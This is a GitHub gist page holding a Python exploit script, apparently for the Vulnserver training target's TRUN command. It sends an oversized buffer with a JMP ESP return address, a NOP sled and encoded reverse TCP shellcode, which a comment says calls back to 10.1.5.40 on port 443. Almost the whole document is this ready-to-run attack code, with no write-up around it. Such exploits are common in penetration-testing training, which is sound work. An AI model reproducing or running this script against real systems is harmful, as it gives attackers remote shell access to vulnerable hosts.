Skip to content

Instantly share code, notes, and snippets.

@BraveLittleRoaster

BraveLittleRoaster/exploit_final.py Secret

Last active October 26, 2016 21:47
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save BraveLittleRoaster/a6f20594ff66de1cc6aeff49a792c5d1 to your computer and use it in GitHub Desktop.
Save BraveLittleRoaster/a6f20594ff66de1cc6aeff49a792c5d1 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
exploit_final.py
#!/user/bin/python
import socket
# Sends a unique string to the remote host. Offset found at 70.
# unique_pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9"
# Known bad chars: x00x0ax0d
# Reverse TCP shell LHOST=10.1.5.40, LPORT=443
shellcode = (
"\xbb\x88\x9d\xb7\x3d\xda\xd8\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x58\x0e\x03\xd0\x93\x55\xc8\x1c\x43\x1b"
"\x33\xdc\x94\x7c\xbd\x39\xa5\xbc\xd9\x4a\x96\x0c\xa9\x1e\x1b"
"\xe6\xff\x8a\xa8\x8a\xd7\xbd\x19\x20\x0e\xf0\x9a\x19\x72\x93"
"\x18\x60\xa7\x73\x20\xab\xba\x72\x65\xd6\x37\x26\x3e\x9c\xea"
"\xd6\x4b\xe8\x36\x5d\x07\xfc\x3e\x82\xd0\xff\x6f\x15\x6a\xa6"
"\xaf\x94\xbf\xd2\xf9\x8e\xdc\xdf\xb0\x25\x16\xab\x42\xef\x66"
"\x54\xe8\xce\x46\xa7\xf0\x17\x60\x58\x87\x61\x92\xe5\x90\xb6"
"\xe8\x31\x14\x2c\x4a\xb1\x8e\x88\x6a\x16\x48\x5b\x60\xd3\x1e"
"\x03\x65\xe2\xf3\x38\x91\x6f\xf2\xee\x13\x2b\xd1\x2a\x7f\xef"
"\x78\x6b\x25\x5e\x84\x6b\x86\x3f\x20\xe0\x2b\x2b\x59\xab\x23"
"\x98\x50\x53\xb4\xb6\xe3\x20\x86\x19\x58\xae\xaa\xd2\x46\x29"
"\xcc\xc8\x3f\xa5\x33\xf3\x3f\xec\xf7\xa7\x6f\x86\xde\xc7\xfb"
"\x56\xde\x1d\xab\x06\x70\xce\x0c\xf6\x30\xbe\xe4\x1c\xbf\xe1"
"\x15\x1f\x15\x8a\xbc\xda\xfe\xbf\x41\xe1\xd7\xd7\x43\xe9\x26"
"\x93\xcd\x0f\x42\xf3\x9b\x98\xfb\x6a\x86\x52\x9d\x73\x1c\x1f"
"\x9d\xf8\x93\xe0\x50\x09\xd9\xf2\x05\xf9\x94\xa8\x80\x06\x03"
"\xc4\x4f\x94\xc8\x14\x19\x85\x46\x43\x4e\x7b\x9f\x01\x62\x22"
"\x09\x37\x7f\xb2\x72\xf3\xa4\x07\x7c\xfa\x29\x33\x5a\xec\xf7"
"\xbc\xe6\x58\xa8\xea\xb0\x36\x0e\x45\x73\xe0\xd8\x3a\xdd\x64"
"\x9c\x70\xde\xf2\xa1\x5c\xa8\x1a\x13\x09\xed\x25\x9c\xdd\xf9"
"\x5e\xc0\x7d\x05\xb5\x40\x8d\x4c\x97\xe1\x06\x09\x42\xb0\x4a"
"\xaa\xb9\xf7\x72\x29\x4b\x88\x80\x31\x3e\x8d\xcd\xf5\xd3\xff"
"\x5e\x90\xd3\xac\x5f\xb1")
cmd = "TRUN ."
buffer = "A"*2006
nop_sled = '\x90'*16
# brk = '\xcc'
# 625011AF FFE4 JMP ESP
offset = "\xaf\x11\x50\x62"
# Maximum allocation of memory is 3000 bytes, we pad the rest of the buffer with Cs
padding = "C" * (3000 - 2006 - 4 - 351 -1)
attack = buffer + offset + nop_sled + shellcode + padding
print "Sending Evil Buffer!"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('10.1.5.40', 80))
s.recv(1024)
s.send((cmd + attack + '\r\n'))
s.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment